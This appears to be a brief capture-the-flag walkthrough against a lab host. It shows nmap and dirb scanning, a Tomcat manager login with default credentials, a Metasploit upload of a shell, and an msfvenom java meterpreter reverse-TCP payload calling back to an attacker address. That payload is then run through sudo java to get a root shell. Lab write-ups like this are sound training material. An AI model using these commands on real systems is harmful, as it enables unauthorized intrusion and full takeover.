Scanning the host with nmap -A -T4 -p- 192.168.1.10

And with dirb http://192.168.1.10

We can access the page http://192.168.1.10:8080/manager/html using the default credentials tomcat:tomcat

Now that we can log in, we can use msfconsole to upload a shell with exploit/multi/http/tomcat_mgr_upload

Running the LinEnum.sh script gave me a lot of information:


We’re going to create a jar exploit like this:
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.13 LPORT=3333 -f raw -o exploit.jar
Then we transfer the file to the target and run this command:
sudo /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7.x86_64/jre/bin/java -jar exploit.jar
And we get a shell as root.

Navigate to the root folder and catch the flag:
